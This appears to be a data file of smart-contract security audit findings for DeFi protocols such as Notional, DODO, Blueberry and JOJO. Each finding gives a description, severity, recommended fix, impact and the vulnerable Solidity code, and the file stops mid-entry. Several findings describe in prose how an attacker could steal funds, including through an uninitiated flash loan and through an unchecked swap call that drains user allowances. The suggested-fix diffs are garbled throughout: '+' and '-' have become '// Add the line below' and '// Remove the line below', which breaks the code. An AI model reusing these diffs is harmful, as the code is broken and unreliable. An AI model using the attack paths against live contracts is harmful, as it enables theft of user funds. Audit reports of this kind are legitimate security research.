The base implementation for vaults does not seem to sanitise `liquidator` and hence users could deleverage accounts on behalf of a `liquidator` which has approved Notional's contracts.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\nчMake the necessary changes to `BaseStrategyVault.sol` or `_authenticateDeleverage()`, whichever is preferred.чA user may be forced to liquidate an account they do not wish to purchase vault shares for.ч```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. 
settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, \"Must Settle\");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n -MarginTrading.sol: Missing flash loan initiator check allows attacker to open trades, close trades and steal fundsчhighчThe `MarginTrading.executeOperation` function is called when a flash loan is made (and it can only be called by the lendingPool).\\nThe wrong assumption by the protocol is that the flash loan can only be initiated by the `MarginTrading` contract itself.\\nHowever this is not true. A flash loan can be initiated for any `receiverAddress`.\\n\\nSo an attacker can execute a flash loan with the `MarginTrading` contract as `receiverAddress`. Also the funds that are needed to pay back the flash loan are pulled from the `receiverAddress` and NOT from the initiator:\\nThis means the attacker can close a position or repay a position in the `MarginTrading` contract.\\nBy crafting a malicious swap, the attacker can even steal funds.\\nLet's assume there is an ongoing trade in a `MarginTrading` contract:\\n```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n\\nIn order to profit from this the attacker does the following (not considering fees for simplicity):\\nTake a flash loan of 30000 DAI with `MarginTrading` as `receiverAddress` with `mode=0` (flash loan is paid back in the same transaction)\\nPrice of WETH has dropped to 2000 DAI. 
The attacker uses a malicious swap contract that pockets 10000 DAI for the attacker and swaps the remaining 20000 DAI to 10 WETH (the attacker can freely choose the swap contract in the `_params` of the flash loan).\\nThe 10 WETH debt is repaid\\nWithdraw 30000 DAI from Aave to pay back the flash loanчThe fix is straightforward:\\n```\\ndiff --git a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..5b4b485 100644\\n--- a/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo-margin-trading-contracts/contracts/marginTrading/MarginTrading.sol\\n@@ -125,6 // Add the line below\\n125,7 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n address _initiator,\\n bytes calldata _params\\n ) external override onlyLendingPool returns (bool) {\\n// Add the line below\\n require(_initiator == address(this));\\n //decode params exe swap and deposit\\n {\\n```\\n\\nThis ensures that the flash loan has been initiated by the `MarginTrading.executeFlashLoans` function which is the intended initiator.чThe attacker can close trades, partially close trades and even steal funds.\\n(Note: It's not possible for the attacker to open trades because he cannot incur debt on behalf of the `MarginTrading` contract)ч```\\ndaiAToken balance = 30000\\nwethDebtToken balance = 10\\n\\nThe price of WETH when the trade was opened was ~ 3000 DAI\\n```\\n -MarginTrading.sol: The whole balance and not just the traded funds are deposited into Aave when a trade is openedчmediumчIt's expected by the protocol that funds can be in the `MarginTrading` contract without being deposited into Aave as margin.\\nWe can see this by looking at the `MarginTradingFactory.depositMarginTradingETH` and `MarginTradingFactory.depositMarginTradingERC20` functions.\\nIf the user sets 
`margin=false` as the parameter, the funds are only sent to the `MarginTrading` contract but NOT deposited into Aave.\\nSo clearly there is the expectation for funds to be in the `MarginTrading` contract that should not be deposited into Aave.\\nThis becomes an issue when a trade is opened.\\nLet's look at the `MarginTrading._openTrade` function that is called when a trade is opened:\\nThe whole balance of the token will be deposited into Aave:\\n```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n\\nNot just those funds that have been acquired by the swap. This means that funds that should stay in the `MarginTrading` contract might also be deposited as margin.чIt is necessary to differentiate the funds that are acquired by the swap and those funds that were there before and should stay in the contract:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\nindex f68c1f3..42f96cf 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/dodo// Remove the line below\\nmargin// Remove the line below\\ntrading// Remove the line below\\ncontracts/contracts/marginTrading/MarginTrading.sol\\n@@ // Remove the line below\\n261,6 // Add the line below\\n261,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n bytes memory _swapParams,\\n address[] memory _tradeAssets\\n ) 
internal {\\n// Add the line below\\n int256[] memory _amountsBefore = new uint256[](_tradeAssets.length);\\n// Add the line below\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n _amountsBefore[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Add the line below\\n }\\n if (_swapParams.length > 0) {\\n // approve to swap route\\n for (uint256 i = 0; i < _swapApproveToken.length; i// Add the line below\\n// Add the line below\\n) {\\n@@ // Remove the line below\\n272,8 // Add the line below\\n276,10 @@ contract MarginTrading is OwnableUpgradeable, IMarginTrading, IFlashLoanReceiver\\n }\\n uint256[] memory _tradeAmounts = new uint256[](_tradeAssets.length);\\n for (uint256 i = 0; i < _tradeAssets.length; i// Add the line below\\n// Add the line below\\n) {\\n// Remove the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this));\\n// Remove the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n if (_amountsBefore[i] < IERC20(_tradeAssets[i]).balanceOf(address(this))) {\\n// Add the line below\\n _tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)) // Remove the line below\\n _amountsBefore[i];\\n// Add the line below\\n _lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1);\\n// Add the line below\\n }\\n }\\n emit OpenPosition(_swapAddress, _swapApproveToken, _tradeAssets, _tradeAmounts);\\n }\\n```\\n\\nIf funds that were in the contract prior to the swap should be deposited there is the separate `MarginTrading.lendingPoolDeposit` function to achieve this.чWhen opening a trade funds can be deposited into Aave unintentionally. 
Thereby the funds act as margin and the trade can incur a larger loss than expected.ч```\\n_tradeAmounts[i] = IERC20(_tradeAssets[i]).balanceOf(address(this)); \\n_lendingPoolDeposit(_tradeAssets[i], _tradeAmounts[i], 1); \\n```\\n -AuraSpell#openPositionFarm fails to return all rewards to userчhighчWhen a user adds to an existing position on AuraSpell, the contract burns their current position and remints them a new one. The issues is that WAuraPool will send all reward tokens to the contract but it only sends Aura back to the user, causing all other rewards to be lost.\\n```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n\\nInside WAuraPools#burn reward tokens are sent to the user.\\n```\\n IBank.Position memory pos = bank.getCurrentPositionInfo();\\n if (pos.collateralSize > 0) {\\n (uint256 pid, ) = wAuraPools.decodeId(pos.collId);\\n if (param.farmingPoolId != pid)\\n revert Errors.INCORRECT_PID(param.farmingPoolId);\\n if (pos.collToken != address(wAuraPools))\\n revert Errors.INCORRECT_COLTOKEN(pos.collToken);\\n bank.takeCollateral(pos.collateralSize);\\n wAuraPools.burn(pos.collId, pos.collateralSize);\\n _doRefundRewards(AURA);\\n }\\n```\\n\\nWe see above that the contract only refunds Aura to the user causing all other extra reward tokens received by the contract to be lost to the user.чWAuraPool returns the reward tokens it sends. 
Use this list to refund all tokens to the userчUser will lose all extra reward tokens from their original positionч```\\n for (uint i = 0; i < rewardTokens.length; i++) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n }\\n```\\n -ShortLongSpell#openPosition uses the wrong balanceOf when determining how much collateral to putчhighчThe _doPutCollateral subcall in ShortLongSpell#openPosition uses the balance of the uToken rather than the vault resulting in the vault tokens being left in the contract which will be stolen.\\n```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nWhen putting the collateral the contract is putting vault but it uses the balance of the uToken instead of the balance of the vault.чUse the balanceOf vault rather than vault.uTokenчVault tokens will be left in contract and stolenч```\\n address vault = strategies[param.strategyId].vault;\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n -BalancerPairOracle#getPrice will revert due to division by zero in some casesчmediumч`BalancerPairOracle#getPrice` internally calls `computeFairReserves`, which returns fair reserve amounts given spot reserves, weights, and fair prices. When the parameter `resA` passed to `computeFairReserves` is smaller than `resB`, division by 0 will occur.\\nIn `BalancerPairOracle#getPrice`, resA and resB passed to `computeFairReserves` are the balance of TokenA and TokenB of the pool respectively. 
It is common for the balance of TokenB to be greater than the balance of TokenA.\\n```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n\\nAnother case is when the decimals of tokenA is smaller than the decimals of tokenB, such as usdc(e6)-weth(e18).ч```\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/blueberry// Remove the line below\\ncore/contracts/oracle/BalancerPairOracle.sol\\n@@ // Remove the line below\\n50,7 // Add the line below\\n50,7 @@ contract BalancerPairOracle is UsingBaseOracle, IBaseOracle {\\n // // Remove the line below\\n// Remove the line below\\n> fairResA / r1^wB = constant product\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA^wA * resB^wB * r1^wB\\n // // Remove the line below\\n// Remove the line below\\n> fairResA = resA * (resB/resA)^wB * r1^wB = resA * (r1/r0)^wB\\n// Remove the line below\\n uint256 r0 = resA / resB;\\n// Add the line below\\n uint256 r0 = resA * 10**(decimalsB) / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n```\\nчAll functions that subcall `BalancerPairOracle#getPrice` will 
be affected.ч```\\nfunction computeFairReserves(\\n uint256 resA,\\n uint256 resB,\\n uint256 wA,\\n uint256 wB,\\n uint256 pxA,\\n uint256 pxB\\n ) internal pure returns (uint256 fairResA, uint256 fairResB) {\\n // rest of code\\n //@audit r0 = 0 when resA < resB.\\n-> uint256 r0 = resA / resB;\\n uint256 r1 = (wA * pxB) / (wB * pxA);\\n // fairResA = resA * (r1 / r0) ^ wB\\n // fairResB = resB * (r0 / r1) ^ wA\\n if (r0 > r1) {\\n uint256 ratio = r1 / r0;\\n fairResA = resA * (ratio ** wB);\\n fairResB = resB / (ratio ** wA);\\n } else {\\n-> uint256 ratio = r0 / r1; // radio = 0 when r0 = 0\\n-> fairResA = resA / (ratio ** wB); // revert divided by 0\\n fairResB = resB * (ratio ** wA);\\n }\\n }\\n```\\n -Updating the feeManager on config will cause desync between bank and vaultsчmediumчWhen the bank is initialized it caches the current config.feeManager. This is problematic since feeManager can be updated in config. Since it is precached the address in bank will not be updated leading to a desync between contracts that always pull the freshest value for feeManager and bank.\\n```\\n feeManager = config_.feeManager();\\n```\\n\\nAbove we see that feeManager is cached during initialization.\\n```\\n withdrawAmount = config.feeManager().doCutVaultWithdrawFee(\\n address(uToken),\\n shareAmount\\n );\\n```\\n\\nThis is in direct conflict with other contracts that always use the freshest value. This is problematic for a few reasons. The desync will lead to inconsistent fees across the ecosystem either charging users too many fees or not enough.чBlueBerryBank should always use config.feeManager instead of caching it.чAfter an update, users will experience inconsistent fees across the ecosystemч```\\n feeManager = config_.feeManager();\\n```\\n -ShortLongSpell#openPosition attempts to burn wrong tokenчmediumчShortLongSpell#openPosition attempts to burn vault.uToken when it should be using vault instead. 
The result is that ShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their position\\n```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n\\nWe see above that the contract attempts to withdraw vault.uToken from the wrapper.\\n```\\n _doPutCollateral(\\n vault,\\n IERC20Upgradeable(ISoftVault(vault).uToken()).balanceOf(\\n address(this)\\n )\\n );\\n```\\n\\nThis is in direct conflict with the collateral that is actually deposited which is vault. This will cause the function to always revert when adding to an existing position.чBurn token should be vault rather than vault.uTokenчShortLongSpell#openPosition will be completely nonfunctional when the user is adding to their positionч```\\n address burnToken = address(ISoftVault(strategy.vault).uToken());\\n if (collSize > 0) {\\n if (posCollToken != address(wrapper))\\n revert Errors.INCORRECT_COLTOKEN(posCollToken);\\n bank.takeCollateral(collSize);\\n wrapper.burn(burnToken, collSize);\\n _doRefund(burnToken);\\n }\\n```\\n -All allowances to DepositStableCoinToDealer and GeneralRepay can be stolen due to unsafe callчhighчDepositStableCoinToDealer.sol and GeneralRepay.sol are helper contracts that allow a user to swap and enter JOJODealer and JUSDBank respectively. 
The issue is that the call is unsafe allowing the contract to call the token contracts directly and transfer tokens from anyone who has approved the contract.\\n```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n\\nWe can see above that the call is totally unprotected allowing a user to make any call to any contract. This can be abused by calling the token contract and using the allowances of others. The attack would go as follows:\\nUser A approves the contract for 100 USDT\\nUser B sees this approval and calls depositStableCoin with the swap target as the USDT contract with themselves as the receiver\\nThis transfers all of user A USDT to themчOnly allow users to call certain whitelisted contracts.чAll allowances can be stolenч```\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), amount);\\n (address approveTarget, address swapTarget, bytes memory data) = abi\\n .decode(param, (address, address, bytes));\\n // if usdt\\n IERC20(asset).approve(approveTarget, 0);\\n IERC20(asset).approve(approveTarget, amount);\\n (bool success, ) = swapTarget.call(data);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n```\\n -JUSD borrow fee rate is less than it should beчmediumчThe borrow fee rate calculation is wrong causing the protocol to take less fees than it should.\\nThe borrowFeeRate is calculated through getTRate():\\n```\\n function getTRate() public view returns (uint256) {\\n uint256 
timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n\\n`t0Rate` is initialized as `1e18` in the test contracts:\\n```\\n constructor(\\n uint256 _maxReservesNum,\\n address _insurance,\\n address _JUSD,\\n address _JOJODealer,\\n uint256 _maxPerAccountBorrowAmount,\\n uint256 _maxTotalBorrowAmount,\\n uint256 _borrowFeeRate,\\n address _primaryAsset\\n ) {\\n // // rest of code\\n t0Rate = JOJOConstant.ONE;\\n }\\n```\\n\\n`SECONDS_PER_YEAR` is equal to `365 days` which is 60 * 60 * 24 * 365 = 31536000:\\n```\\nlibrary JOJOConstant {\\n uint256 public constant SECONDS_PER_YEAR = 365 days;\\n}\\n```\\n\\nAs time passes, `getTRate()` value will increase. When a user borrows JUSD the contract doesn't save the actual amount of JUSD they borrow, `tAmount`. Instead, it saves the current \"value\" of it, t0Amount:\\n```\\n function _borrow(\\n DataTypes.UserInfo storage user,\\n bool isDepositToJOJO,\\n address to,\\n uint256 tAmount,\\n address from\\n ) internal {\\n uint256 tRate = getTRate();\\n // tAmount % tRate ? tAmount / tRate + 1 : tAmount % tRate\\n uint256 t0Amount = tAmount.decimalRemainder(tRate)\\n ? tAmount.decimalDiv(tRate)\\n : tAmount.decimalDiv(tRate) + 1;\\n user.t0BorrowBalance += t0Amount;\\n```\\n\\nWhen you repay the JUSD, the same calculation is done again to decrease the borrowed amount. Meaning, as time passes, you have to repay more JUSD.\\nLet's say that JUSDBank was live for a year with a borrowing fee rate of 10% (1e17). `getTRate()` would then return: $1e18 + 1e17 * 31536000 / 31536000 = 1.1e18$\\nIf the user now borrows 1 JUSD we get: $1e6 * 1e18 / 1.1e18 ~= 909091$ for `t0Amount`. That's not the expected 10% decrease. 
Instead, it's about 9.1%.чChange formula to: `t0Amount = tAmount - tAmount.decimalMul(tRate)` where `t0Rate` is initialized with `0` instead of `1e18`.чUsers are able to borrow JUSD for cheaper than expectedч```\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return\\n t0Rate +\\n (borrowFeeRate * timeDifference) /\\n JOJOConstant.SECONDS_PER_YEAR;\\n }\\n```\\n -Subaccount#execute lacks payableчmediumч`Subaccount#execute` lacks `payable`. If `value` in `Subaccount#execute` is not zero, it could always revert.\\n`Subaccount#execute` lacks `payable`. The caller cannot send the value.\\n```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n\\nThe `Subaccount` contract does not implement receive() `payable` or fallback() `payable`, so it is unable to receive value (eth) . 
Therefore, `Subaccount#execute` needs to add `payable`.чAdd a receive() external `payable` to the contract or `execute()` to add a `payable` modifier.ч`Subaccount#execute` cannot work if `value` != 0.ч```\\nfunction execute(address to, bytes calldata data, uint256 value) external onlyOwner returns (bytes memory){\\n require(to != address(0));\\n-> (bool success, bytes memory returnData) = to.call{value: value}(data);\\n if (!success) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n emit ExecuteTransaction(owner, address(this), to, data, value);\\n return returnData;\\n }\\n```\\n -It's possible to reset primaryCredit and secondaryCredit for insurance accountчmediumчWhen because of negative credit after liquidations of another accounts, insurance address doesn't pass `isSafe` check, then malicious user can call JOJOExternal.handleBadDebt and reset both primaryCredit and secondaryCredit for insurance account.\\n`insurance` account is handled by JOJO team. Team is responsible to top up this account in order to cover losses. When bad debt is handled, then its negative credit value is added to the `insurance` account. 
Because of that it's possible that primaryCredit of `insurance` account is negative and `Liquidation._isSafe(state, insurance) == false`.\\n```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n\\nSo it's possible for anyone to call `handleBadDebt` for `insurance` address, once its primaryCredit is negative and `Liquidation._isSafe(state, insurance) == false`. This will reset both primaryCredit and secondaryCredit variables to 0 and break `insurance` calculations.чDo not allow `handleBadDebt` call with insurance address.чInsurance primaryCredit and secondaryCredit variables are reset.ч```\\n function handleBadDebt(Types.State storage state, address liquidatedTrader)\\n external\\n {\\n if (\\n state.openPositions[liquidatedTrader].length == 0 &&\\n !Liquidation._isSafe(state, liquidatedTrader)\\n ) {\\n int256 primaryCredit = state.primaryCredit[liquidatedTrader];\\n uint256 secondaryCredit = state.secondaryCredit[liquidatedTrader];\\n state.primaryCredit[state.insurance] += primaryCredit;\\n state.secondaryCredit[state.insurance] += secondaryCredit;\\n state.primaryCredit[liquidatedTrader] = 0;\\n state.secondaryCredit[liquidatedTrader] = 0;\\n emit HandleBadDebt(\\n liquidatedTrader,\\n primaryCredit,\\n secondaryCredit\\n );\\n }\\n }\\n```\\n -When the `JUSDBank.withdraw()` is to another internal account the `ReserveInfo.isDepositAllowed` is not 
validatedчmediumчThe internal withdraw does not validate if the collateral reserve has activated/deactivated the isDepositAllowed variable\\nThe JUSDBank.withdraw() function has a param called isInternal that helps to indicate if the withdraw amount is internal between accounts or not. When the withdraw is internal the `ReserveInfo.isDepositAllowed` is not validated.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\n\\nIn the other hand, the `isDepositAllowed` is validated in the deposit function in the `code line 255` but the withdraw to internal account is not validated.\\n```\\nFile: JUSDBank.sol\\n function _deposit(\\n DataTypes.ReserveInfo storage reserve,\\n DataTypes.UserInfo storage user,\\n uint256 amount,\\n address collateral,\\n address to,\\n address from\\n ) internal {\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n```\\n\\nAdditionally, the `ReserveInfo.isDepositAllowed` can be modified via the JUSDOperation.delistReserve() function. 
So any collateral's deposits can be deactivated at any time.\\n```\\nFile: JUSDOperation.sol\\n function delistReserve(address collateral) external onlyOwner {\\n DataTypes.ReserveInfo storage reserve = reserveInfo[collateral];\\n reserve.isBorrowAllowed = false;\\n reserve.isDepositAllowed = false;\\n reserve.isFinalLiquidation = true;\\n emit RemoveReserve(collateral);\\n }\\n```\\nчAdd a `Reserve.isDepositAllowed` validation when the withdrawal is to another internal account.\\n```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n// Add the line below\\n// Add the line below\\n require(reserve.isDepositAllowed, JUSDErrors.RESERVE_NOT_ALLOW_DEPOSIT);\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] // Add the line below\\n= amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// rest of code\\n```\\nчThe collateral's reserve can get deposits via the internal withdraw even when the `Reserve.isDepositAllowed` is turned off making the `Reserve.isDepositAllowed` useless because the collateral deposits can be via `internal withdrawals`.ч```\\nFile: JUSDBank.sol\\n function _withdraw(\\n uint256 amount,\\n address collateral,\\n address to,\\n address from,\\n bool isInternal\\n ) internal {\\n// rest of code\\n// rest of code\\n if (isInternal) {\\n DataTypes.UserInfo storage toAccount = userInfo[to];\\n _addCollateralIfNotExists(toAccount, collateral);\\n toAccount.depositBalance[collateral] += amount;\\n require(\\n toAccount.depositBalance[collateral] <=\\n reserve.maxDepositAmountPerAccount,\\n JUSDErrors.EXCEED_THE_MAX_DEPOSIT_AMOUNT_PER_ACCOUNT\\n );\\n// rest of code\\n// 
rest of code\\n```\\n -Lack of burn mechanism for JUSD repayments causes oversupply of JUSDчmediumч`JUSDBank.repay()` allow users to repay their JUSD debt and interest by transfering in JUSD tokens. Without a burn mechanism, it will cause an oversupply of JUSD that is no longer backed by any collateral.\\n`JUSDBank` receives JUSD tokens for the repayment of debt and interest. However, there are no means to burn these tokens, causing JUSD balance in `JUSDBank` to keep increasing.\\nThat will lead to an oversupply of JUSD that is not backed by any collateral. And the oversupply of JUSD will increase significantly during market due to mass repayments from liquidation.\\n```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, JUSDErrors.REPAY_AMOUNT_IS_ZERO);\\n uint256 JUSDBorrowed = user.t0BorrowBalance.decimalMul(tRate);\\n uint256 tBorrowAmount;\\n uint256 t0Amount;\\n if (JUSDBorrowed <= amount) {\\n tBorrowAmount = JUSDBorrowed;\\n t0Amount = user.t0BorrowBalance;\\n } else {\\n tBorrowAmount = amount;\\n t0Amount = amount.decimalDiv(tRate);\\n }\\n IERC20(JUSD).safeTransferFrom(payer, address(this), tBorrowAmount);\\n user.t0BorrowBalance -= t0Amount;\\n t0TotalBorrowAmount -= t0Amount;\\n emit Repay(payer, to, tBorrowAmount);\\n return tBorrowAmount;\\n }\\n```\\nчInstead of transfering to the JUSDBank upon repayment, consider adding a burn mechanism to reduce the supply of JUSD so that it will be adjusted automatically.чTo maintain its stability, JUSD must always be backed by more than 1 USD worth of collateral.\\nWhen there is oversupply of JUSD that is not backed by any collateral, it affects JUSD stability and possibly lead to a depeg event.ч```\\n function _repay(\\n DataTypes.UserInfo storage user,\\n address payer,\\n address to,\\n uint256 amount,\\n uint256 tRate\\n ) internal returns (uint256) {\\n require(amount != 0, 
